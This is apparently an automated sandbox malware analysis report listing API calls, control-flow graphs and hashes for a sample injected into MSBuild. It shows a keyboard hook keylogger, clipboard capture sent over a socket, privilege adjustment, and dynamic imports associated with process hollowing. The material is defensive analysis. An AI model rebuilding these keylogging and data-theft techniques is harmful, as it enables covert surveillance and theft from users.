                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00415A89
                                                                                                                                                                                      • Part of subcall function 00404468: send.WS2_32(000002E0,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3520204547-0
                                                                                                                                                                                    • Opcode ID: 3a7e4f33a3e022d1b01f4a7aa625db061848c5be4a14c20c955616a9f3133e94
                                                                                                                                                                                    • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a7e4f33a3e022d1b01f4a7aa625db061848c5be4a14c20c955616a9f3133e94
                                                                                                                                                                                    • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1670 4099e4-4099fd 1671 409a63-409a73 GetMessageA 1670->1671 1672 4099ff-409a19 GetModuleHandleA SetWindowsHookExA 1670->1672 1673 409a75-409a8d TranslateMessage DispatchMessageA 1671->1673 1674 409a8f 1671->1674 1672->1671 1675 409a1b-409a61 GetLastError call 41ad46 call 404c9e call 401f66 call 41a686 call 401eea 1672->1675 1673->1671 1673->1674 1676 409a91-409a96 1674->1676 1675->1676
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                                                                                                                    • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00409A1B
                                                                                                                                                                                      • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Keylogger initialization failure: error , xrefs: 00409A32
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                                                                                    • String ID: Keylogger initialization failure: error
                                                                                                                                                                                    • API String ID: 3219506041-952744263
                                                                                                                                                                                    • Opcode ID: 0500c0fb2287cc403513c8d0c8af8369f78a70941d761820a418b2e0bcaa973e
                                                                                                                                                                                    • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0500c0fb2287cc403513c8d0c8af8369f78a70941d761820a418b2e0bcaa973e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1687 100010f1-10001166 call 10002c40 * 2 lstrlenW call 10002c40 lstrcatW lstrlenW 1694 10001177-1000119e lstrlenW FindFirstFileW 1687->1694 1695 10001168-10001172 lstrlenW 1687->1695 1696 100011a0-100011a8 1694->1696 1697 100011e1-100011e9 1694->1697 1695->1694 1698 100011c7-100011d8 FindNextFileW 1696->1698 1699 100011aa-100011c4 call 10001000 1696->1699 1698->1696 1701 100011da-100011db FindClose 1698->1701 1699->1698 1701->1697
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1083526818-0
                                                                                                                                                                                    • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                                                    • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                                                                                                    • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                                                    • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                                                                                      • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                                                                                      • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                                                                                    • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                                                                                    • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                                                                                                                    • API String ID: 2281282204-3981147832
                                                                                                                                                                                    • Opcode ID: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
                                                                                                                                                                                    • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                                                                                                                                                    • Opcode Fuzzy Hash: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                                                                                      • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                                                                                      • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                                                                                      • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                                                                                      • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                                                                                                                    • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                                                                                    • String ID: PowrProf.dll$SetSuspendState
                                                                                                                                                                                    • API String ID: 1589313981-1420736420
                                                                                                                                                                                    • Opcode ID: 56eed2a0c493a37a9ebd172ea33a7f1355f0ef0f1c53220ea3ac6de77a0ff222
                                                                                                                                                                                    • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                                                                                                                                                    • Opcode Fuzzy Hash: 56eed2a0c493a37a9ebd172ea33a7f1355f0ef0f1c53220ea3ac6de77a0ff222
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                                                                                                                    • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                                                                                                                    • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                                                                                                                    • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3525466593-0
                                                                                                                                                                                    • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                                                                                                    • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLocalTime.KERNEL32(00000001,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404946
                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404994
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Create$EventLocalThreadTime
                                                                                                                                                                                    • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                                    • API String ID: 2532271599-1507639952
                                                                                                                                                                                    • Opcode ID: 91fcc87cdf63508fbb142367321fb0c568eb54b34a3fc30a6c2ed25526885608
                                                                                                                                                                                    • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 91fcc87cdf63508fbb142367321fb0c568eb54b34a3fc30a6c2ed25526885608
                                                                                                                                                                                    • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                                                                                                                                                    • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                                                                                                                                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1815803762-0
                                                                                                                                                                                    • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                                                                                    • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                                                                                    • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetComputerNameExW.KERNEL32(00000001,?,0000002B,00474358), ref: 0041A7BF
                                                                                                                                                                                    • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Name$ComputerUser
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4229901323-0
                                                                                                                                                                                    • Opcode ID: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                                                                                                                                    • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                                                                                                                    • Opcode Fuzzy Hash: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                                    • Opcode ID: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                                                                                                                    • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                                                                                                                    • Opcode Fuzzy Hash: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                                                                                                                    • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: recv
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1507349165-0
                                                                                                                                                                                    • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                                                                                    • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 5 40d767-40d7e9 call 41bce3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afc3 call 40e8bd call 401d8c call 43e820 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 49 40dc96-40dca7 call 401eea 23->49 79 40d9a5-40d9ac call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 70->69 100 40e134-40e154 call 401e8f call 412902 call 4112b5 70->100 88 40d9b5-40d9bc 79->88 89 40d9ae-40d9b0 79->89 80->79 99 40d98e-40d9a4 call 401e8f call 412902 80->99 94 40d9c0-40d9cc call 41a463 88->94 95 40d9be 88->95 93 40dc95 89->93 93->49 104 40d9d5-40d9d9 94->104 105 40d9ce-40d9d0 94->105 95->94 99->79 108 40da18-40da2b call 401d64 call 401e8f 104->108 109 40d9db call 40697b 104->109 105->104 127 40da32-40daba call 401d64 call 41ae08 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 108->127 128 40da2d call 4069ba 108->128 117 40d9e0-40d9e2 109->117 120 40d9e4-40d9e9 call 40699d call 4064d0 117->120 121 40d9ee-40da01 call 401d64 call 401e8f 117->121 120->121 121->108 138 40da03-40da09 121->138 163 40db22-40db26 127->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a611 127->164 128->127 138->108 140 40da0b-40da11 138->140 140->108 142 40da13 call 4064d0 140->142 142->108 166 40dcaa-40dd01 call 436050 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->166 167 40db2c-40db33 163->167 164->163 190 40dad7-40db1d call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 164->190 220 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5e7 166->220 169 40dbb1-40dbbb call 4082d7 167->169 170 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 167->170 176 40dbc0-40dbe4 call 4022f8 call 4338c8 169->176 170->176 197 40dbf3 176->197 198 40dbe6-40dbf1 call 436050 176->198 190->163 203 40dbf5-40dc40 call 401e07 call 43e349 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 197->203 198->203 258 40dc45-40dc6a call 4338d1 call 401d64 call 40b125 203->258 272 40dd79-40dd7b 220->272 273 40dd5e 220->273 258->220 274 40dc70-40dc91 call 401d64 call 41ae08 call 40e219 258->274 276 40dd81 272->276 277 40dd7d-40dd7f 272->277 275 40dd60-40dd77 call 41beb0 CreateThread 273->275 274->220 292 40dc93 274->292 281 40dd87-40de66 call 401f66 * 2 call 41a686 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->281 276->281 277->275 330 40dea1 281->330 331 40de68-40de9f call 43360d call 401d64 call 401e8f CreateThread 281->331 292->93 332 40dea3-40debb call 401d64 call 401e8f 330->332 331->332 343 40def9-40df0c call 401d64 call 401e8f 332->343 344 40debd-40def4 call 43360d call 401d64 call 401e8f CreateThread 332->344 353 40df6c-40df7f call 401d64 call 401e8f 343->353 354 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 343->354 344->343 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 40b95c 353->365 366 40dfba-40dfde call 41a7a2 call 401e18 call 401e13 353->366 354->353 365->366 386 40dfe0-40dfe1 SetProcessDEPPolicy 366->386 387 40dfe3-40dff6 CreateThread 366->387 386->387 391 40e004-40e00b 387->391 392 40dff8-40e002 CreateThread 387->392 396 40e019-40e020 391->396 397 40e00d-40e017 CreateThread 391->397 392->391 398 40e022-40e025 396->398 399 40e033-40e038 396->399 397->396 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a686 call 401eea 399->404 413 40e094-40e0d4 call 41ae08 call 401e07 call 412584 call 401e13 call 401e07 401->413 414 40e12a-40e12f call 40cbac call 413fd4 401->414 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 413->433 414->100 434 40e0f4-40e125 call 41ae08 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->414 435->434 437 40e0db-40e0e8 Sleep call 401e07 435->437 437->433
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                                                                                                      • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                                                                                                                      • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                                                                                                      • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                                                                                                                      • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                                                                                                                      • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                                                                                                                      • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                                                                                                                      • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                                                                                                                      • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                                                                                                                      • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                                                                                                                      • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                                                                                      • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                                                                                      • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                                                                                      • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                                                                                      • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                                                                                      • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                                                                                      • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
